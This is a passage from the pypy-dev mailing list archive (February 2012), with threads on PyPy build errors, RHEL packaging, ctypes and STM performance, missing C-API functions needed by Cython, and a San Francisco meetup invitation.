drv.proceed(goals) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/translator/driver.py", line 814, in proceed [translation:ERROR] return self._execute(goals, task_skip = self._maybe_skip()) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/translator/tool/taskengine.py", line 116, in _execute [translation:ERROR] res = self._do(goal, taskcallable, *args, **kwds) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/translator/driver.py", line 287, in _do [translation:ERROR] res = func() [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/translator/driver.py", line 399, in task_pyjitpl_lltype [translation:ERROR] backend_name=self.config.translation.jit_backend, inline=True) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 48, in apply_jit [translation:ERROR] warmrunnerdesc.finish() [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 236, in finish [translation:ERROR] self.annhelper.finish() [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/rpython/annlowlevel.py", line 240, in finish [translation:ERROR] self.finish_annotate() [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/rpython/annlowlevel.py", line 259, in finish_annotate [translation:ERROR] ann.complete_helpers(self.policy) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 180, in complete_helpers [translation:ERROR] self.complete() [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 254, in complete [translation:ERROR] self.processblock(graph, block) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 452, in processblock [translation:ERROR] self.flowin(graph, block) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 512, in flowin [translation:ERROR] self.consider_op(block.operations[i]) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 714, in consider_op [translation:ERROR] raise_nicer_exception(op, str(graph)) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 711, in consider_op [translation:ERROR] resultcell = consider_meth(*argcells) [translation:ERROR] File "<4444-codegen /home/pclass/Desktop/pypy/pypy/annotation/annrpython.py:749>", line 3, in consider_op_simple_call [translation:ERROR] return arg.simple_call(*args) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/unaryop.py", line 175, in simple_call [translation:ERROR] return obj.call(getbookkeeper().build_args("simple_call", args_s)) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/unaryop.py", line 706, in call [translation:ERROR] return bookkeeper.pbc_call(pbc, args) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/bookkeeper.py", line 668, in pbc_call [translation:ERROR] results.append(desc.pycall(schedule, args, s_previous_result, op)) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/description.py", line 976, in pycall [translation:ERROR] return self.funcdesc.pycall(schedule, args, s_previous_result, op) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/description.py", line 297, in pycall [translation:ERROR] result = schedule(graph, inputcells) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/bookkeeper.py", line 664, in schedule [translation:ERROR] return self.annotator.recursivecall(graph, whence, inputcells) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 395, in recursivecall [translation:ERROR] position_key) [translation:ERROR] File "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 235, in addpendingblock [translation:ERROR] assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg [translation:ERROR] AssertionError': [translation:ERROR] .. v2309 = simple_call(v2301, v2302, v2303, v2304, v2305, v2306, v2307, v2308) [translation:ERROR] .. '(pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook' [translation:ERROR] Processing block: [translation:ERROR] block at 226 is a [translation:ERROR] in (pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook [translation:ERROR] containing the following operations: [translation:ERROR] v2309 = simple_call(v2301, v2302, v2303, v2304, v2305, v2306, v2307, v2308) [translation:ERROR] --end-- [translation] start debugger... > /home/pclass/Desktop/pypy/pypy/annotation/annrpython.py(235)addpendingblock() -> assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg (Pdb+) -------------- next part -------------- An HTML attachment was scrubbed... URL: From dmalcolm at redhat.com Tue Feb 21 17:16:04 2012 From: dmalcolm at redhat.com (David Malcolm) Date: Tue, 21 Feb 2012 11:16:04 -0500 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: <4F3991C8.5040305@u.washington.edu> References: <4F3991C8.5040305@u.washington.edu> Message-ID: <1329840965.15787.29.camel@surprise> On Mon, 2012-02-13 at 14:42 -0800, Dale Hubler wrote: > Hello, > > I was requested to install pypy but our computers appear to be too new > to run it, having libssl.so.0.9.8e among other newer items. This > confuses me because the web page for pypy shows a 2011 date and blog > entries from 2012. Can 2005 SSL really be a requirement, I am unable > to install such an old item on a cluster where this software might be used. > > I looked at the pypy site but cannot find any supported platforms, > install guide, etc. I am trying this on RedHat EL 5. I tried the > binary release, but it also had the same error, no libssl.so.0.9.8, > which is true, my systems are updated. I must be missing something. > Do you have any links or other on-line info explaining how to build pypy. FWIW, I've built PyPy 1.8 in RPM form for RHEL 5 and 6, within the "EPEL" community repositories: http://fedoraproject.org/wiki/EPEL So if you've configured the EPEL repos, you can install pypy via: # yum install pypy and not have to do the translation yourself. Note that this is a side-project by me, not an "official" Red Hat-supported thing. The EPEL 5 builds of pypy 1.8 can be seen here: https://admin.fedoraproject.org/updates/FEDORA-EPEL-2012-0276 The EPEL 6 builds of pypy 1.8 can be seen here: https://admin.fedoraproject.org/updates/FEDORA-EPEL-2012-0275 Hope this is helpful Dave From lameiro at gmail.com Tue Feb 21 17:16:34 2012 From: lameiro at gmail.com (Leandro Lameiro) Date: Tue, 21 Feb 2012 17:16:34 +0100 Subject: [pypy-dev] Building PyPy with cx_Oracle fails In-Reply-To: References: Message-ID: Hi Phillip, I am not involved in the efforts to produce the RPython version of cx_Oracle, and have little knowledge of its maturity and compatibility. That said, I worked on a ctypes-based version of cx_Oracle, specifically tested with PyPy. It has a very good percentage of tests passing from the original cx_Oracle test suite, but it has not been tested in the real-world yet, and its performance is generally worse than C-based cx_Oracle. If you are interested, check it out at https://github.com/lameiro/cx_oracle_on_ctypes 2012/2/21 Phillip Class > Building PyPy with cx_Oracle fails. I am using Python 2.7 on Ubuntu 64-bit > with Oracle 11.2. Build command is: python translate.py -Ojit > targetpypystandalone.py --withmod-oracle. > Below is the traceback: > > [Timer] Timings: > [Timer] annotate --- 1834.3 s > [Timer] rtype_lltype --- 1697.2 s > [Timer] pyjitpl_lltype --- 1216.3 s > [Timer] =========================================== > [Timer] Total: --- 4747.9 s > [translation:ERROR] Error: > [translation:ERROR] Traceback (most recent call last): > [translation:ERROR] File "translate.py", line 309, in main > [translation:ERROR] drv.proceed(goals) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/translator/driver.py", line 814, in proceed > [translation:ERROR] return self._execute(goals, task_skip = > self._maybe_skip()) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/translator/tool/taskengine.py", line 116, > in _execute > [translation:ERROR] res = self._do(goal, taskcallable, *args, **kwds) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/translator/driver.py", line 287, in _do > [translation:ERROR] res = func() > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/translator/driver.py", line 399, in > task_pyjitpl_lltype > [translation:ERROR] backend_name=self.config.translation.jit_backend, > inline=True) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 48, in > apply_jit > [translation:ERROR] warmrunnerdesc.finish() > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/jit/metainterp/warmspot.py", line 236, in > finish > [translation:ERROR] self.annhelper.finish() > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/rpython/annlowlevel.py", line 240, in finish > [translation:ERROR] self.finish_annotate() > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/rpython/annlowlevel.py", line 259, in > finish_annotate > [translation:ERROR] ann.complete_helpers(self.policy) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 180, in > complete_helpers > [translation:ERROR] self.complete() > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 254, in > complete > [translation:ERROR] self.processblock(graph, block) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 452, in > processblock > [translation:ERROR] self.flowin(graph, block) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 512, in > flowin > [translation:ERROR] self.consider_op(block.operations[i]) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 714, in > consider_op > [translation:ERROR] raise_nicer_exception(op, str(graph)) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 711, in > consider_op > [translation:ERROR] resultcell = consider_meth(*argcells) > [translation:ERROR] File "<4444-codegen > /home/pclass/Desktop/pypy/pypy/annotation/annrpython.py:749>", line 3, in > consider_op_simple_call > [translation:ERROR] return arg.simple_call(*args) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/unaryop.py", line 175, in > simple_call > [translation:ERROR] return > obj.call(getbookkeeper().build_args("simple_call", args_s)) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/unaryop.py", line 706, in call > [translation:ERROR] return bookkeeper.pbc_call(pbc, args) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/bookkeeper.py", line 668, in > pbc_call > [translation:ERROR] results.append(desc.pycall(schedule, args, > s_previous_result, op)) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/description.py", line 976, in > pycall > [translation:ERROR] return self.funcdesc.pycall(schedule, args, > s_previous_result, op) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/description.py", line 297, in > pycall > [translation:ERROR] result = schedule(graph, inputcells) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/bookkeeper.py", line 664, in > schedule > [translation:ERROR] return self.annotator.recursivecall(graph, whence, > inputcells) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 395, in > recursivecall > [translation:ERROR] position_key) > [translation:ERROR] File > "/home/pclass/Desktop/pypy/pypy/annotation/annrpython.py", line 235, in > addpendingblock > [translation:ERROR] assert annmodel.unionof(s_oldarg, s_newarg) == > s_oldarg > [translation:ERROR] AssertionError': > [translation:ERROR] .. v2309 = simple_call(v2301, v2302, v2303, v2304, > v2305, v2306, v2307, v2308) > [translation:ERROR] .. > '(pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook' > [translation:ERROR] Processing block: > [translation:ERROR] block at 226 is a 'pypy.objspace.flow.flowcontext.SpamBlock'> > [translation:ERROR] in > (pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook > [translation:ERROR] containing the following operations: > [translation:ERROR] v2309 = simple_call(v2301, v2302, v2303, v2304, > v2305, v2306, v2307, v2308) > [translation:ERROR] --end-- > [translation] start debugger... > > > /home/pclass/Desktop/pypy/pypy/annotation/annrpython.py(235)addpendingblock() > -> assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg > (Pdb+) > > > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev > > -- Best regards, Leandro Lameiro Blog: http://lameiro.wordpress.com Twitter: http://twitter.com/lameiro -------------- next part -------------- An HTML attachment was scrubbed... URL: From cfbolz at gmx.de Tue Feb 21 17:21:45 2012 From: cfbolz at gmx.de (Carl Friedrich Bolz) Date: Tue, 21 Feb 2012 17:21:45 +0100 Subject: [pypy-dev] [pypy-commit] pypy default: issue1059 testing In-Reply-To: References: <20120220111837.4B3BB820D1@wyvern.cs.uni-duesseldorf.de> Message-ID: <4F43C499.5030201@gmx.de> On 02/20/2012 06:50 PM, Alex Gaynor wrote: > Unfortunately this commit has some bad effects. Going through an > iterator in popitem() will result in O(N**2) behavior for repeated > calls. If you look at the r_dict implementation of popitem() you can > see the fix there. This is just the default implementation for the DictStrategy base class. All interesting subclasses override this default. The segfault happened because the dict proxy strategy doesn't override it. So yes, calling A.__dict__.popitem repeatedly for a class A is O(N**2). Do we care? Cheers, Carl Friedrich From alex.gaynor at gmail.com Tue Feb 21 17:25:28 2012 From: alex.gaynor at gmail.com (Alex Gaynor) Date: Tue, 21 Feb 2012 11:25:28 -0500 Subject: [pypy-dev] [pypy-commit] pypy default: issue1059 testing In-Reply-To: <4F43C499.5030201@gmx.de> References: <20120220111837.4B3BB820D1@wyvern.cs.uni-duesseldorf.de> <4F43C499.5030201@gmx.de> Message-ID: On Tue, Feb 21, 2012 at 11:21 AM, Carl Friedrich Bolz wrote: > On 02/20/2012 06:50 PM, Alex Gaynor wrote: > > Unfortunately this commit has some bad effects. Going through an > > iterator in popitem() will result in O(N**2) behavior for repeated > > calls. If you look at the r_dict implementation of popitem() you can > > see the fix there. > > This is just the default implementation for the DictStrategy base class. > All interesting subclasses override this default. The segfault happened > because the dict proxy strategy doesn't override it. > > So yes, calling A.__dict__.popitem repeatedly for a class A is O(N**2). Do > we care? > > Cheers, > > Carl Friedrich > ______________________________**_________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/**mailman/listinfo/pypy-dev > No, anyone doing that deserves what they get ;) Sorry I missed that the subclass overrode it. Alex -- "I disapprove of what you say, but I will defend to the death your right to say it." -- Evelyn Beatrice Hall (summarizing Voltaire) "The people's good is the highest law." -- Cicero -------------- next part -------------- An HTML attachment was scrubbed... URL: From sebastien.volle at gmail.com Tue Feb 21 19:03:09 2012 From: sebastien.volle at gmail.com (=?ISO-8859-1?Q?S=E9bastien_Volle?=) Date: Tue, 21 Feb 2012 12:03:09 -0600 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: <4F423EB6.1020601@gmail.com> References: <4F422902.5030106@gmail.com> <4F423EB6.1020601@gmail.com> Message-ID: Hello, I ran stock pypy 1.8 and latest version of ctypes from mercurial and here are the results with a capture file with around 110,000 ARP packets: Stock pypy 1.8: ----------------------------------------------- elapsed time : 2419.07ms Total packets : 110450 packets/s : 45658.02 pypy 1.8 binary and latest ctypes: ----------------------------------------------- elapsed time : 1410.92ms Total packets : 110450 packets/s : 78282.04 CPython 2.6.5: ------------------------------------------------ elapsed time : 964.23ms Total packets : 110450 packets/s : 114547.49 As you can see, in this situation the performance increase is rather significant. CPython still holds the advantage with a fair margin though. Regards, S?bastien Le 20 f?vrier 2012 06:38, Antonio Cuni a ?crit : > On 02/20/2012 12:59 PM, S?bastien Volle wrote: > >> Hello Antonio, >> >> Thank you for the update. I'll try and run a long running capture. Several >> days worth of ARP packets should be enough to maximize JIT effect I >> suppose. >> I'll keep you updated. >> > > to amortize the JIT warmup cost, it's probably enough to have a benchmark > which runs for few seconds. No clue how many days of ARP packets are needed > for that, though :-). > > ciao, > Anto > -------------- next part -------------- An HTML attachment was scrubbed... URL: From arigo at tunes.org Wed Feb 22 10:19:57 2012 From: arigo at tunes.org (Armin Rigo) Date: Wed, 22 Feb 2012 10:19:57 +0100 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: Hi, Update. I found out that the method cache in typeobject.py is still causing troubles, so I disabled it and get the following results (now more consistenty): ?1 thread: 1626ms ?2 threads: 925ms 3 threads: 647ms ?4 threads: 571ms ?8 threads: 429ms So now even 3 threads are enough to get parity with a regular no-jit pypy, even though the latter does use the method cache optimization. A bient?t, Armin. From arigo at tunes.org Wed Feb 22 16:57:56 2012 From: arigo at tunes.org (Armin Rigo) Date: Wed, 22 Feb 2012 16:57:56 +0100 Subject: [pypy-dev] STM status In-Reply-To: References: Message-ID: Re-hi, A further update: for fair comparison I built a version of pypy with no stm, -O2, and disabling the method cache too. It takes 820ms per iteration, not 650ms. This places the pure overhead of STM at just under 2x. That's another milestone: I estimated that we would get an overhead between 2x and 5x, and now we're under 2x :-) Well, CPython 2.7 still runs it in 310ms, but that's maybe not important. I guess I will start in the coming days to play with JIT integration. And of course this is all on richards, an ideal benchmark with no transaction conflicts and no I/O. Right now I/O should work correctly, but immediately force the transaction to become inevitable. There can be only one inevitable transaction at any time and no other transaction can commit; this delays the other transactions if they also try to do I/O or try to commit before the inevitable one. A bient?t, Armin. From stefan_ml at behnel.de Wed Feb 22 21:39:03 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Wed, 22 Feb 2012 21:39:03 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Hi, adding to the list. Stefan Behnel, 19.02.2012 12:10: > Some more errors that I see in the logs up to that point, which all hint at > missing bits of the C-API implementation: > > specialfloatvals.c:490: error: ?Py_HUGE_VAL? undeclared CPython simply defines this as #ifndef Py_HUGE_VAL #define Py_HUGE_VAL HUGE_VAL #endif to allow users to override it on buggy platforms. > buffmt.c:2589: warning: implicit declaration of function ?PyUnicode_Replace? Some more missing parts of the C-API: - PyUnicode_Tailmatch - PyFrozenSet_Type Regarding the PyUnicode_*() functions, I could disable their usage when compiling against PyPy. Would that be helpful? I wouldn't expect them to be hard to implement, though. And disabling means that we'd have to remember to re-enable them when they become available at some point ... Does PyPy's cpyext define a version that we could base that decision on? Stefan From stefan_ml at behnel.de Wed Feb 22 23:28:35 2012 From: stefan_ml at behnel.de (Stefan Behnel) Date: Wed, 22 Feb 2012 23:28:35 +0100 Subject: [pypy-dev] Bringing Cython and PyPy closer together In-Reply-To: References: Message-ID: Stefan Behnel, 22.02.2012 21:39: > adding to the list. > >> Some more errors that I see in the logs up to that point, which all hint at >> missing bits of the C-API implementation: >> >> specialfloatvals.c:490: error: ?Py_HUGE_VAL? undeclared > > CPython simply defines this as > > #ifndef Py_HUGE_VAL > #define Py_HUGE_VAL HUGE_VAL > #endif > > to allow users to override it on buggy platforms. > >> buffmt.c:2589: warning: implicit declaration of function ?PyUnicode_Replace? > > Some more missing parts of the C-API: > > - PyUnicode_Tailmatch > > - PyFrozenSet_Type - PyUnicode_GetMax - the Unicode character type functions: Py_UNICODE_ISTITLE(), Py_UNICODE_ISALPHA(), Py_UNICODE_ISDIGIT(), Py_UNICODE_ISNUMERIC() Our exec/eval implementation is broken because these are missing: PyCode_Check(), PyCode_GetNumFree(), PyEval_EvalCode(), PyEval_MergeCompilerFlags(), PyCF_SOURCE_IS_UTF8, PyRun_StringFlags() I doubt that they will be all that trivial to implement, so I can live with not having them for a while. Code that uses exec/eval will just fail to compile for now. I had to disable the following tests from Cython's test suite because they either crash PyPy or at least corrupt it in a way that infects subsequent tests: bufaccess cascadedassignment control_flow_except_T725 exarkun exceptions_nogil extended_unpacking_T235 fused_def fused_cpdef literal_lists memoryview moduletryexcept purecdef property_decorator_T593 setjmp special_methods_T561_py2 tupleassign tryexcept tuple_unpack_string type_slots_nonzero_bool With those taken out, I get an otherwise complete test run: https://sage.math.washington.edu:8091/hudson/view/dev-scoder/job/cython-scoder-pypy-nightly/23/ Here are the test results: https://sage.math.washington.edu:8091/hudson/view/dev-scoder/job/cython-scoder-pypy-nightly/23/testReport/ It obviously runs longer than a CPython run (22 vs. 7 minutes), even though the runtime is normally dominated by the C compiler runs. However, having learned a bit about the difficulties that PyPy has in emulating the C-API, I'm actually quite impressed how much of this just works at all. Well done. And last but not least, over on python-dev, MvL proposed these two simple functions for accessing the tstate->exc_* fields: - PyErr_GetExcInfo(PyObject** type, PyObject** value, PyObject** tb) - PyErr_SetExcInfo(PyObject* type, PyObject* value, PyObject* tb) http://thread.gmane.org/gmane.comp.python.devel/129787/focus=129792 Makes sense to me. Getting those in would fix our generator/coroutine implementation, amongst other things. Stefan From dhubler at uw.edu Thu Feb 23 00:32:12 2012 From: dhubler at uw.edu (Dale Hubler) Date: Wed, 22 Feb 2012 15:32:12 -0800 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: <1329840965.15787.29.camel@surprise> References: <4F3991C8.5040305@u.washington.edu> <1329840965.15787.29.camel@surprise> Message-ID: <4F457AFC.3070904@uw.edu> Hi to all who answered me and thanks for the good assistance. I gave up on the binary distribution right off, and tried to build it from source on RHEL5. I had the most difficulty with the libffi part, I tried a server located directory, /usr/local, and finally /usr as my libffi installdir, but gave up finally with the key error being the ffi include file not being located. RHEL6 has this libffi library readily available to our installs, I may pursue an install from the source on RHEL6 instead, once I go over the pre-reqs. It worked fine with the existing SSL libraries as others posted, I did not need 0.9.8 at all. The absolute most help are the RPM's built by David Malcolm at EPEL, thanks so much for those. They installed well and I will place them in our satellite server for subsequent kickstarts. Our researchers have had a nice speedup with their python and are very eager to try it. So my next problem is that the users upped their request. They did not tell me they wanted particular modules also, such as numpy. I saw reference to numpypy and will look into that, I've not read any docs on installing pypy modules yet. I'm familiar with installing python modules already. I do have a question along those lines. We have a fileserver located python 2.7.2 and we install python modules into that location. When I am building pypy from the source I have been using that version of python. If I use that python and am successful at building pypy will users of my pypy have access to the python modules in that python install, or rather do I need to independently install all the modules pypy users want into the pypy filetree? i.e., Does pypy use the available python modules on the host, or does it need its own? thanks to all again, Dale On 02/21/2012 08:16 AM, David Malcolm wrote: > > FWIW, I've built PyPy 1.8 in RPM form for RHEL 5 and 6, within the > "EPEL" community repositories: http://fedoraproject.org/wiki/EPEL > > So if you've configured the EPEL repos, you can install pypy via: > > # yum install pypy > > and not have to do the translation yourself. > > Note that this is a side-project by me, not an "official" Red > Hat-supported thing. > > The EPEL 5 builds of pypy 1.8 can be seen here: > https://admin.fedoraproject.org/updates/FEDORA-EPEL-2012-0276 > > The EPEL 6 builds of pypy 1.8 can be seen here: > https://admin.fedoraproject.org/updates/FEDORA-EPEL-2012-0275 > > Hope this is helpful > Dave > -- -- Dale Hubler dhubler at uw.edu (206) 685-4035 Senior Computer Specialist University of Washington Genome Sciences Dept. From anto.cuni at gmail.com Thu Feb 23 09:22:25 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Thu, 23 Feb 2012 09:22:25 +0100 Subject: [pypy-dev] ctypes - PyPy 1.8 slower than Python 2.6.5 In-Reply-To: References: <4F422902.5030106@gmail.com> <4F423EB6.1020601@gmail.com> Message-ID: <4F45F741.8000607@gmail.com> Hello S?bastien, thank you for sharing these numbers. I'm glad to see that my checkin worked so well :-) Indeed, CPython is still quite faster: it might be the case that ~1.5 seconds is still not enough for the jit to fully warm up (especially if there are a lot of hot branches), or simply that you are encountering another case in which we do bad. I don't think I'll have time to investigate further in the next few days, though, but I might do it next week. ciao, Anto On 02/21/2012 07:03 PM, S?bastien Volle wrote: > Hello, > > I ran stock pypy 1.8 and latest version of ctypes from mercurial and here are > the results with a capture file with around 110,000 ARP packets: > > Stock pypy 1.8: > ----------------------------------------------- > elapsed time : 2419.07ms > Total packets : 110450 > packets/s : 45658.02 > > > pypy 1.8 binary and latest ctypes: > ----------------------------------------------- > elapsed time : 1410.92ms > Total packets : 110450 > packets/s : 78282.04 > > > CPython 2.6.5: > ------------------------------------------------ > elapsed time : 964.23ms > Total packets : 110450 > packets/s : 114547.49 > > As you can see, in this situation the performance increase is rather > significant. CPython still holds the advantage with a fair margin though. > > Regards, > S?bastien > > > Le 20 f?vrier 2012 06:38, Antonio Cuni > a ?crit : > > On 02/20/2012 12:59 PM, S?bastien Volle wrote: > > Hello Antonio, > > Thank you for the update. I'll try and run a long running capture. Several > days worth of ARP packets should be enough to maximize JIT effect I > suppose. > I'll keep you updated. > > > to amortize the JIT warmup cost, it's probably enough to have a benchmark > which runs for few seconds. No clue how many days of ARP packets are > needed for that, though :-). > > ciao, > Anto > > From arigo at tunes.org Thu Feb 23 10:26:01 2012 From: arigo at tunes.org (Armin Rigo) Date: Thu, 23 Feb 2012 10:26:01 +0100 Subject: [pypy-dev] question re: ancient SSL requirement of pypy In-Reply-To: <4F457AFC.3070904@uw.edu> References: <4F3991C8.5040305@u.washington.edu> <1329840965.15787.29.camel@surprise> <4F457AFC.3070904@uw.edu> Message-ID: Hi, Maybe we should write down some answers to these questions in a single place... On Thu, Feb 23, 2012 at 00:32, Dale Hubler wrote: > They did not tell me they wanted particular modules also, such as numpy. 'numpypy' is already included in a baseline PyPy but is only a partial implementation of numpy so far. > I do have a question along those lines. ? We have a fileserver located > python 2.7.2 and we install python modules into that location. ?When I am > building pypy from the source I have been using that version of python. What we or you used to translate pypy (cpython 2.5-2.7 or pypy itself) has no effect on the result. You need to install everything for pypy independently, just like you need to install everything independently for various versions of CPython. The module installation is very similar to CPython's. It should mostly just work if you use PyPy instead of CPython to run the installer, e.g. "pypy setup.py install". If the module contains a C extension, it may or may not work out of the box. A bient?t, Armin. From anto.cuni at gmail.com Thu Feb 23 12:01:57 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Thu, 23 Feb 2012 12:01:57 +0100 Subject: [pypy-dev] [pypy-commit] pypy sepcomp2: Functions can be @exported without specifying argument types, In-Reply-To: <20120221233413.88E728203C@wyvern.cs.uni-duesseldorf.de> References: <20120221233413.88E728203C@wyvern.cs.uni-duesseldorf.de> Message-ID: <4F461CA5.2020703@gmail.com> Hi Amaury, On 02/22/2012 12:34 AM, amauryfa wrote: > Author: Amaury Forgeot d'Arc > Branch: sepcomp2 > Changeset: r52748:ce2d7e8a1b42 > Date: 2012-02-21 23:28 +0100 > http://bitbucket.org/pypy/pypy/changeset/ce2d7e8a1b42/ > + def test_implied_signature(self): > + @export # No explicit signature here. > + def f(x): > + return x + 1.5 > + @export() # This is an explicit signature, with no argument. > + def f2(): > + f(1.0) what about using @export(implicit=True) or something like that? Else @export and @export() are too easy to confound, IMHO. ciao, Anto From amauryfa at gmail.com Thu Feb 23 13:54:06 2012 From: amauryfa at gmail.com (Amaury Forgeot d'Arc) Date: Thu, 23 Feb 2012 13:54:06 +0100 Subject: [pypy-dev] [pypy-commit] pypy sepcomp2: Functions can be @exported without specifying argument types, In-Reply-To: <4F461CA5.2020703@gmail.com> References: <20120221233413.88E728203C@wyvern.cs.uni-duesseldorf.de> <4F461CA5.2020703@gmail.com> Message-ID: 2012/2/23 Antonio Cuni > Hi Amaury, > > On 02/22/2012 12:34 AM, amauryfa wrote: > >> Author: Amaury Forgeot d'Arc >> Branch: sepcomp2 >> Changeset: r52748:ce2d7e8a1b42 >> Date: 2012-02-21 23:28 +0100 >> http://bitbucket.org/pypy/**pypy/changeset/ce2d7e8a1b42/ >> > > + def test_implied_signature(self): >> + @export # No explicit signature here. >> + def f(x): >> + return x + 1.5 >> + @export() # This is an explicit signature, with no argument. >> + def f2(): >> + f(1.0) >> > > > what about using @export(implicit=True) or something like that? Else > @export and @export() are too easy to confound, IMHO. > That's right. I'll change it to @export_auto, unless someone has a better name. -- Amaury Forgeot d'Arc -------------- next part -------------- An HTML attachment was scrubbed... URL: From nam.nguyen at lolapps.com Thu Feb 23 21:53:02 2012 From: nam.nguyen at lolapps.com (Nam Nguyen) Date: Thu, 23 Feb 2012 12:53:02 -0800 Subject: [pypy-dev] Invitation to San Francisco Python meetup Message-ID: Hi all, I'm helping out the SF Python meetup group organize a pre-PyCon meetup in that same week. I am also soliciting half-hour talks from PyPy developers. So if you happened to stay in San Francisco and the surrounding area, would you attend the meetup and/or give us a talk? I noticed some core PyPy developers would also be attending PyCon 2012. We'd be glad to have you present your talks at the meetup too. That would be very helpful to many people who could not attend your sessions. Cheers, Nam PS: I personally long for some sharing on STM. From fijall at gmail.com Thu Feb 23 22:19:26 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Thu, 23 Feb 2012 14:19:26 -0700 Subject: [pypy-dev] Invitation to San Francisco Python meetup In-Reply-To: References: Message-ID: On Thu, Feb 23, 2012 at 1:53 PM, Nam Nguyen wrote: > Hi all, > > I'm helping out the SF Python meetup group organize a pre-PyCon meetup > in that same week. I am also soliciting half-hour talks from PyPy > developers. > > So if you happened to stay in San Francisco and the surrounding area, > would you attend the meetup and/or give us a talk? > > I noticed some core PyPy developers would also be attending PyCon > 2012. We'd be glad to have you present your talks at the meetup too. > That would be very helpful to many people who could not attend your > sessions. > > Cheers, > Nam > PS: I personally long for some sharing on STM. > _______________________________________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/mailman/listinfo/pypy-dev Hi I'm in the are from the coming Friday, so I'm good to give a talk any time next week as well. Armin is arriving later and might be more jetlagged :) Cheers, fijal From tbaldridge at gmail.com Fri Feb 24 02:56:12 2012 From: tbaldridge at gmail.com (Timothy Baldridge) Date: Thu, 23 Feb 2012 19:56:12 -0600 Subject: [pypy-dev] libgmp Message-ID: For a project I'm working on, I'd like to have support for gmp in pypy. I have a ctypes pypy module, but from what I understand, pypy's ctypes are a bit slow compared to CPython. What's the best way to get access to get access to libgmp from python? Would you be against a pull request that added libgmp as an RPython module? Thanks Timothy -- ?One of the main causes of the fall of the Roman Empire was that?lacking zero?they had no way to indicate successful termination of their C programs.? (Robert Firth) From william.leslie.ttg at gmail.com Fri Feb 24 03:06:24 2012 From: william.leslie.ttg at gmail.com (William ML Leslie) Date: Fri, 24 Feb 2012 13:06:24 +1100 Subject: [pypy-dev] libgmp In-Reply-To: References: Message-ID: On 24 February 2012 13:05, William ML Leslie wrote: > On 24 February 2012 12:56, Timothy Baldridge wrote: >> For a project I'm working on, I'd like to have support for gmp in >> pypy. I have a ctypes pypy module, but from what I understand, pypy's >> ctypes are a bit slow compared to CPython. > > On the contrary, ctypes is particularly fast on pypy for common usage. > ?Does your benchmark get to the point of JITting it? Sorry, forgot to reply-all. -- William Leslie From fijall at gmail.com Fri Feb 24 03:18:36 